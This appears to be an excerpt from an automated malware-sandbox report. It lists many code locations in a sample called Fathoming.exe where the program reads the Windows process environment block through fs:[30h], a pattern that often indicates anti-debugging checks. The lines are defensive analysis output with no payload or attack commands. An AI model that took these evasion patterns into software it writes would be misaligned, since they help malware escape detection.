      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exeCode function: 8_2_21B0438F mov eax, dword ptr fs:[00000030h]8_2_21B0438F
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exeCode function: 8_2_21AF03E9 mov eax, dword ptr fs:[00000030h]8_2_21AF03E9
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exeCode function: 8_2_21AF03E9 mov eax, dword ptr fs:[00000030h]8_2_21AF03E9
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exeCode function: 8_2_21AF03E9 mov eax, dword ptr fs:[00000030h]8_2_21AF03E9
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exeCode function: 8_2_21AF03E9 mov eax, dword ptr fs:[00000030h]8_2_21AF03E9
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exeCode function: 8_2_21AF03E9 mov eax, dword ptr fs:[00000030h]8_2_21AF03E9
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exeCode function: 8_2_21AF03E9 mov eax, dword ptr fs:[00000030h]8_2_21AF03E9
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exeCode function: 8_2_21AF03E9 mov eax, dword ptr fs:[00000030h]8_2_21AF03E9
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exeCode function: 8_2_21AF03E9 mov eax, dword ptr fs:[00000030h]8_2_21AF03E9
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exeCode function: 8_2_21B163FF mov eax, dword ptr fs:[00000030h]8_2_21B163FF
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exeCode function: 8_2_21AFE3F0 mov eax, dword ptr fs:[00000030h]8_2_21AFE3F0
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exeCode function: 8_2_21AFE3F0 mov eax, dword ptr fs:[00000030h]8_2_21AFE3F0
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exeCode function: 8_2_21AFE3F0 mov eax, dword ptr fs:[00000030h]8_2_21AFE3F0
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exeCode function: 8_2_21B8E3DB mov eax, dword ptr fs:[00000030h]8_2_21B8E3DB
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exeCode function: 8_2_21B8E3DB mov eax, dword ptr fs:[00000030h]8_2_21B8E3DB
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exeCode function: 8_2_21B8E3DB mov ecx, dword ptr fs:[00000030h]8_2_21B8E3DB
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exeCode function: 8_2_21B8E3DB mov eax, dword ptr fs:[00000030h]8_2_21B8E3DB
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exeCode function: 8_2_21B843D4 mov eax, dword ptr fs:[00000030h]8_2_21B843D4
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exeCode function: 8_2_21B843D4 mov eax, dword ptr fs:[00000030h]8_2_21B843D4
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exeCode function: 8_2_21AEA3C0 mov eax, dword ptr fs:[00000030h]8_2_21AEA3C0
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exeCode function: 8_2_21AEA3C0 mov eax, dword ptr fs:[00000030h]8_2_21AEA3C0
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exeCode function: 8_2_21AEA3C0 mov eax, dword ptr fs:[00000030h]8_2_21AEA3C0
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exeCode function: 8_2_21AEA3C0 mov eax, dword ptr fs:[00000030h]8_2_21AEA3C0
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exeCode function: 8_2_21AEA3C0 mov eax, dword ptr fs:[00000030h]8_2_21AEA3C0
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exeCode function: 8_2_21AEA3C0 mov eax, dword ptr fs:[00000030h]8_2_21AEA3C0
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exeCode function: 8_2_21AE83C0 mov eax, dword ptr fs:[00000030h]8_2_21AE83C0
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exeCode function: 8_2_21AE83C0 mov eax, dword ptr fs:[00000030h]8_2_21AE83C0
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exeCode function: 8_2_21AE83C0 mov eax, dword ptr fs:[00000030h]8_2_21AE83C0
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exeCode function: 8_2_21AE83C0 mov eax, dword ptr fs:[00000030h]8_2_21AE83C0
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exeCode function: 8_2_21B9C3CD mov eax, dword ptr fs:[00000030h]8_2_21B9C3CD
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exeCode function: 8_2_21BB8324 mov eax, dword ptr fs:[00000030h]8_2_21BB8324
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exeCode function: 8_2_21BB8324 mov ecx, dword ptr fs:[00000030h]8_2_21BB8324
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exeCode function: 8_2_21BB8324 mov eax, dword ptr fs:[00000030h]8_2_21BB8324
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exeCode function: 8_2_21BB8324 mov eax, dword ptr fs:[00000030h]8_2_21BB8324
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exeCode function: 8_2_21B00310 mov ecx, dword ptr fs:[00000030h]8_2_21B00310
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exeCode function: 8_2_21B1A30B mov eax, dword ptr fs:[00000030h]8_2_21B1A30B
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exeCode function: 8_2_21B1A30B mov eax, dword ptr fs:[00000030h]8_2_21B1A30B
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exeCode function: 8_2_21B1A30B mov eax, dword ptr fs:[00000030h]8_2_21B1A30B
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exeCode function: 8_2_21ADC310 mov ecx, dword ptr fs:[00000030h]8_2_21ADC310
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exeCode function: 8_2_21B8437C mov eax, dword ptr fs:[00000030h]8_2_21B8437C
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exeCode function: 8_2_21BAA352 mov eax, dword ptr fs:[00000030h]8_2_21BAA352
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exeCode function: 8_2_21B88350 mov ecx, dword ptr fs:[00000030h]8_2_21B88350
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exeCode function: 8_2_21B6035C mov eax, dword ptr fs:[00000030h]8_2_21B6035C
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exeCode function: 8_2_21B6035C mov eax, dword ptr fs:[00000030h]8_2_21B6035C
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exeCode function: 8_2_21B6035C mov eax, dword ptr fs:[00000030h]8_2_21B6035C
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exeCode function: 8_2_21B6035C mov ecx, dword ptr fs:[00000030h]8_2_21B6035C
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exeCode function: 8_2_21B6035C mov eax, dword ptr fs:[00000030h]8_2_21B6035C
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exeCode function: 8_2_21B6035C mov eax, dword ptr fs:[00000030h]8_2_21B6035C
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exeCode function: 8_2_21BB634F mov eax, dword ptr fs:[00000030h]8_2_21BB634F
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exeCode function: 8_2_21B62349 mov eax, dword ptr fs:[00000030h]8_2_21B62349
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exeCode function: 8_2_21B62349 mov eax, dword ptr fs:[00000030h]8_2_21B62349
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exeCode function: 8_2_21B62349 mov eax, dword ptr fs:[00000030h]8_2_21B62349
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exeCode function: 8_2_21B62349 mov eax, dword ptr fs:[00000030h]8_2_21B62349
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exeCode function: 8_2_21B62349 mov eax, dword ptr fs:[00000030h]8_2_21B62349
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exeCode function: 8_2_21B62349 mov eax, dword ptr fs:[00000030h]8_2_21B62349
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exeCode function: 8_2_21B62349 mov eax, dword ptr fs:[00000030h]8_2_21B62349
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exeCode function: 8_2_21B62349 mov eax, dword ptr fs:[00000030h]8_2_21B62349
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exeCode function: 8_2_21B62349 mov eax, dword ptr fs:[00000030h]8_2_21B62349
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exeCode function: 8_2_21B62349 mov eax, dword ptr fs:[00000030h]8_2_21B62349
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exeCode function: 8_2_21B62349 mov eax, dword ptr fs:[00000030h]8_2_21B62349
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exeCode function: 8_2_21B62349 mov eax, dword ptr fs:[00000030h]8_2_21B62349
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exeCode function: 8_2_21B62349 mov eax, dword ptr fs:[00000030h]8_2_21B62349
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exeCode function: 8_2_21B62349 mov eax, dword ptr fs:[00000030h]8_2_21B62349
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exeCode function: 8_2_21B62349 mov eax, dword ptr fs:[00000030h]8_2_21B62349
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exeCode function: 8_2_21AF02A0 mov eax, dword ptr fs:[00000030h]8_2_21AF02A0
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exeCode function: 8_2_21AF02A0 mov eax, dword ptr fs:[00000030h]8_2_21AF02A0
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exeCode function: 8_2_21B762A0 mov eax, dword ptr fs:[00000030h]8_2_21B762A0
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exeCode function: 8_2_21B762A0 mov ecx, dword ptr fs:[00000030h]8_2_21B762A0
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exeCode function: 8_2_21B762A0 mov eax, dword ptr fs:[00000030h]8_2_21B762A0
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exeCode function: 8_2_21B762A0 mov eax, dword ptr fs:[00000030h]8_2_21B762A0
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exeCode function: 8_2_21B762A0 mov eax, dword ptr fs:[00000030h]8_2_21B762A0
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exeCode function: 8_2_21B762A0 mov eax, dword ptr fs:[00000030h]8_2_21B762A0
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exeCode function: 8_2_21B60283 mov eax, dword ptr fs:[00000030h]8_2_21B60283
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exeCode function: 8_2_21B60283 mov eax, dword ptr fs:[00000030h]8_2_21B60283
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exeCode function: 8_2_21B60283 mov eax, dword ptr fs:[00000030h]8_2_21B60283
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exeCode function: 8_2_21B1E284 mov eax, dword ptr fs:[00000030h]8_2_21B1E284
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exeCode function: 8_2_21B1E284 mov eax, dword ptr fs:[00000030h]8_2_21B1E284
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exeCode function: 8_2_21AF02E1 mov eax, dword ptr fs:[00000030h]8_2_21AF02E1
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exeCode function: 8_2_21AF02E1 mov eax, dword ptr fs:[00000030h]8_2_21AF02E1
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exeCode function: 8_2_21AF02E1 mov eax, dword ptr fs:[00000030h]8_2_21AF02E1
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exeCode function: 8_2_21AEA2C3 mov eax, dword ptr fs:[00000030h]8_2_21AEA2C3
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exeCode function: 8_2_21AEA2C3 mov eax, dword ptr fs:[00000030h]8_2_21AEA2C3
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exeCode function: 8_2_21AEA2C3 mov eax, dword ptr fs:[00000030h]8_2_21AEA2C3
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exeCode function: 8_2_21AEA2C3 mov eax, dword ptr fs:[00000030h]8_2_21AEA2C3
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exeCode function: 8_2_21AEA2C3 mov eax, dword ptr fs:[00000030h]8_2_21AEA2C3
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exeCode function: 8_2_21BB62D6 mov eax, dword ptr fs:[00000030h]8_2_21BB62D6
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exeCode function: 8_2_21AD823B mov eax, dword ptr fs:[00000030h]8_2_21AD823B
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exeCode function: 8_2_21AD826B mov eax, dword ptr fs:[00000030h]8_2_21AD826B
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exeCode function: 8_2_21B90274 mov eax, dword ptr fs:[00000030h]8_2_21B90274
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exeCode function: 8_2_21B90274 mov eax, dword ptr fs:[00000030h]8_2_21B90274
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exeCode function: 8_2_21B90274 mov eax, dword ptr fs:[00000030h]8_2_21B90274
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exeCode function: 8_2_21B90274 mov eax, dword ptr fs:[00000030h]8_2_21B90274
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exeCode function: 8_2_21B90274 mov eax, dword ptr fs:[00000030h]8_2_21B90274
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exeCode function: 8_2_21B90274 mov eax, dword ptr fs:[00000030h]8_2_21B90274
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exeCode function: 8_2_21B90274 mov eax, dword ptr fs:[00000030h]8_2_21B90274
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exeCode function: 8_2_21B90274 mov eax, dword ptr fs:[00000030h]8_2_21B90274
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exeCode function: 8_2_21B90274 mov eax, dword ptr fs:[00000030h]8_2_21B90274
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exeCode function: 8_2_21B90274 mov eax, dword ptr fs:[00000030h]8_2_21B90274
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exeCode function: 8_2_21B90274 mov eax, dword ptr fs:[00000030h]8_2_21B90274
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exeCode function: 8_2_21B90274 mov eax, dword ptr fs:[00000030h]8_2_21B90274
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exeCode function: 8_2_21AE4260 mov eax, dword ptr fs:[00000030h]8_2_21AE4260
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exeCode function: 8_2_21AE4260 mov eax, dword ptr fs:[00000030h]8_2_21AE4260
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exeCode function: 8_2_21AE4260 mov eax, dword ptr fs:[00000030h]8_2_21AE4260
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exeCode function: 8_2_21BB625D mov eax, dword ptr fs:[00000030h]8_2_21BB625D
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exeCode function: 8_2_21B9A250 mov eax, dword ptr fs:[00000030h]8_2_21B9A250
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exeCode function: 8_2_21B9A250 mov eax, dword ptr fs:[00000030h]8_2_21B9A250
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exeCode function: 8_2_21B68243 mov eax, dword ptr fs:[00000030h]8_2_21B68243
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exeCode function: 8_2_21B68243 mov ecx, dword ptr fs:[00000030h]8_2_21B68243
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exeCode function: 8_2_21AE6259 mov eax, dword ptr fs:[00000030h]8_2_21AE6259
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exeCode function: 8_2_21ADA250 mov eax, dword ptr fs:[00000030h]8_2_21ADA250
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exeCode function: 8_2_21B045B1 mov eax, dword ptr fs:[00000030h]8_2_21B045B1
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exeCode function: 8_2_21B045B1 mov eax, dword ptr fs:[00000030h]8_2_21B045B1
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exeCode function: 8_2_21B605A7 mov eax, dword ptr fs:[00000030h]8_2_21B605A7
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exeCode function: 8_2_21B605A7 mov eax, dword ptr fs:[00000030h]8_2_21B605A7
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exeCode function: 8_2_21B605A7 mov eax, dword ptr fs:[00000030h]8_2_21B605A7
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exeCode function: 8_2_21AE2582 mov eax, dword ptr fs:[00000030h]8_2_21AE2582
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exeCode function: 8_2_21AE2582 mov ecx, dword ptr fs:[00000030h]8_2_21AE2582
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exeCode function: 8_2_21B1E59C mov eax, dword ptr fs:[00000030h]8_2_21B1E59C
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exeCode function: 8_2_21B14588 mov eax, dword ptr fs:[00000030h]8_2_21B14588
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exeCode function: 8_2_21AE25E0 mov eax, dword ptr fs:[00000030h]8_2_21AE25E0
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exeCode function: 8_2_21B0E5E7 mov eax, dword ptr fs:[00000030h]8_2_21B0E5E7
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exeCode function: 8_2_21B0E5E7 mov eax, dword ptr fs:[00000030h]8_2_21B0E5E7
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exeCode function: 8_2_21B0E5E7 mov eax, dword ptr fs:[00000030h]8_2_21B0E5E7
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exeCode function: 8_2_21B0E5E7 mov eax, dword ptr fs:[00000030h]8_2_21B0E5E7
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exeCode function: 8_2_21B0E5E7 mov eax, dword ptr fs:[00000030h]8_2_21B0E5E7
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exeCode function: 8_2_21B0E5E7 mov eax, dword ptr fs:[00000030h]8_2_21B0E5E7
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exeCode function: 8_2_21B0E5E7 mov eax, dword ptr fs:[00000030h]8_2_21B0E5E7
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exeCode function: 8_2_21B0E5E7 mov eax, dword ptr fs:[00000030h]8_2_21B0E5E7
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exeCode function: 8_2_21B1C5ED mov eax, dword ptr fs:[00000030h]8_2_21B1C5ED
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exeCode function: 8_2_21B1C5ED mov eax, dword ptr fs:[00000030h]8_2_21B1C5ED
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exeCode function: 8_2_21B1A5D0 mov eax, dword ptr fs:[00000030h]8_2_21B1A5D0
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exeCode function: 8_2_21B1A5D0 mov eax, dword ptr fs:[00000030h]8_2_21B1A5D0
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exeCode function: 8_2_21B1E5CF mov eax, dword ptr fs:[00000030h]8_2_21B1E5CF
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exeCode function: 8_2_21B1E5CF mov eax, dword ptr fs:[00000030h]8_2_21B1E5CF
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exeCode function: 8_2_21AE65D0 mov eax, dword ptr fs:[00000030h]8_2_21AE65D0
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exeCode function: 8_2_21B0E53E mov eax, dword ptr fs:[00000030h]8_2_21B0E53E
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exeCode function: 8_2_21B0E53E mov eax, dword ptr fs:[00000030h]8_2_21B0E53E
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exeCode function: 8_2_21B0E53E mov eax, dword ptr fs:[00000030h]8_2_21B0E53E
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exeCode function: 8_2_21B0E53E mov eax, dword ptr fs:[00000030h]8_2_21B0E53E
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exeCode function: 8_2_21B0E53E mov eax, dword ptr fs:[00000030h]8_2_21B0E53E
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exeCode function: 8_2_21AF0535 mov eax, dword ptr fs:[00000030h]8_2_21AF0535
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exeCode function: 8_2_21AF0535 mov eax, dword ptr fs:[00000030h]8_2_21AF0535
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exeCode function: 8_2_21AF0535 mov eax, dword ptr fs:[00000030h]8_2_21AF0535
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exeCode function: 8_2_21AF0535 mov eax, dword ptr fs:[00000030h]8_2_21AF0535
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exeCode function: 8_2_21AF0535 mov eax, dword ptr fs:[00000030h]8_2_21AF0535
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exeCode function: 8_2_21AF0535 mov eax, dword ptr fs:[00000030h]8_2_21AF0535
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exeCode function: 8_2_21B76500 mov eax, dword ptr fs:[00000030h]8_2_21B76500
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exeCode function: 8_2_21BB4500 mov eax, dword ptr fs:[00000030h]8_2_21BB4500
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exeCode function: 8_2_21BB4500 mov eax, dword ptr fs:[00000030h]8_2_21BB4500
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exeCode function: 8_2_21BB4500 mov eax, dword ptr fs:[00000030h]8_2_21BB4500
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exeCode function: 8_2_21BB4500 mov eax, dword ptr fs:[00000030h]8_2_21BB4500
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exeCode function: 8_2_21BB4500 mov eax, dword ptr fs:[00000030h]8_2_21BB4500
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exeCode function: 8_2_21BB4500 mov eax, dword ptr fs:[00000030h]8_2_21BB4500
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exeCode function: 8_2_21BB4500 mov eax, dword ptr fs:[00000030h]8_2_21BB4500
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exeCode function: 8_2_21B1656A mov eax, dword ptr fs:[00000030h]8_2_21B1656A
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exeCode function: 8_2_21B1656A mov eax, dword ptr fs:[00000030h]8_2_21B1656A
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exeCode function: 8_2_21B1656A mov eax, dword ptr fs:[00000030h]8_2_21B1656A
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exeCode function: 8_2_21AE8550 mov eax, dword ptr fs:[00000030h]8_2_21AE8550
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exeCode function: 8_2_21AE8550 mov eax, dword ptr fs:[00000030h]8_2_21AE8550
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exeCode function: 8_2_21B144B0 mov ecx, dword ptr fs:[00000030h]8_2_21B144B0
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exeCode function: 8_2_21AE64AB mov eax, dword ptr fs:[00000030h]8_2_21AE64AB
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exeCode function: 8_2_21B6A4B0 mov eax, dword ptr fs:[00000030h]8_2_21B6A4B0
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exeCode function: 8_2_21B9A49A mov eax, dword ptr fs:[00000030h]8_2_21B9A49A
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exeCode function: 8_2_21AE04E5 mov ecx, dword ptr fs:[00000030h]8_2_21AE04E5
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exeCode function: 8_2_21B1A430 mov eax, dword ptr fs:[00000030h]8_2_21B1A430
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exeCode function: 8_2_21ADC427 mov eax, dword ptr fs:[00000030h]8_2_21ADC427
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exeCode function: 8_2_21ADE420 mov eax, dword ptr fs:[00000030h]8_2_21ADE420
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exeCode function: 8_2_21ADE420 mov eax, dword ptr fs:[00000030h]8_2_21ADE420
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exeCode function: 8_2_21ADE420 mov eax, dword ptr fs:[00000030h]8_2_21ADE420
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exeCode function: 8_2_21B66420 mov eax, dword ptr fs:[00000030h]8_2_21B66420
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exeCode function: 8_2_21B66420 mov eax, dword ptr fs:[00000030h]8_2_21B66420
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exeCode function: 8_2_21B66420 mov eax, dword ptr fs:[00000030h]8_2_21B66420
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exeCode function: 8_2_21B66420 mov eax, dword ptr fs:[00000030h]8_2_21B66420
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exeCode function: 8_2_21B66420 mov eax, dword ptr fs:[00000030h]8_2_21B66420
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exeCode function: 8_2_21B66420 mov eax, dword ptr fs:[00000030h]8_2_21B66420
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exeCode function: 8_2_21B66420 mov eax, dword ptr fs:[00000030h]8_2_21B66420
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exeCode function: 8_2_21B18402 mov eax, dword ptr fs:[00000030h]8_2_21B18402
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exeCode function: 8_2_21B18402 mov eax, dword ptr fs:[00000030h]8_2_21B18402
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exeCode function: 8_2_21B18402 mov eax, dword ptr fs:[00000030h]8_2_21B18402
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exeCode function: 8_2_21B0A470 mov eax, dword ptr fs:[00000030h]8_2_21B0A470
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exeCode function: 8_2_21B0A470 mov eax, dword ptr fs:[00000030h]8_2_21B0A470
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exeCode function: 8_2_21B0A470 mov eax, dword ptr fs:[00000030h]8_2_21B0A470
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exeCode function: 8_2_21B6C460 mov ecx, dword ptr fs:[00000030h]8_2_21B6C460
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exeCode function: 8_2_21B0245A mov eax, dword ptr fs:[00000030h]8_2_21B0245A
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exeCode function: 8_2_21B9A456 mov eax, dword ptr fs:[00000030h]8_2_21B9A456
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exeCode function: 8_2_21AD645D mov eax, dword ptr fs:[00000030h]8_2_21AD645D
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exeCode function: 8_2_21B1E443 mov eax, dword ptr fs:[00000030h]8_2_21B1E443
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exeCode function: 8_2_21B1E443 mov eax, dword ptr fs:[00000030h]8_2_21B1E443
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exeCode function: 8_2_21B1E443 mov eax, dword ptr fs:[00000030h]8_2_21B1E443
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exeCode function: 8_2_21B1E443 mov eax, dword ptr fs:[00000030h]8_2_21B1E443
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exeCode function: 8_2_21B1E443 mov eax, dword ptr fs:[00000030h]8_2_21B1E443
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exeCode function: 8_2_21B1E443 mov eax, dword ptr fs:[00000030h]8_2_21B1E443
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exeCode function: 8_2_21B1E443 mov eax, dword ptr fs:[00000030h]8_2_21B1E443
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exeCode function: 8_2_21B1E443 mov eax, dword ptr fs:[00000030h]8_2_21B1E443
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exeCode function: 8_2_21AE07AF mov eax, dword ptr fs:[00000030h]8_2_21AE07AF
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exeCode function: 8_2_21B947A0 mov eax, dword ptr fs:[00000030h]8_2_21B947A0
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exeCode function: 8_2_21B8678E mov eax, dword ptr fs:[00000030h]8_2_21B8678E
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exeCode function: 8_2_21AE47FB mov eax, dword ptr fs:[00000030h]8_2_21AE47FB
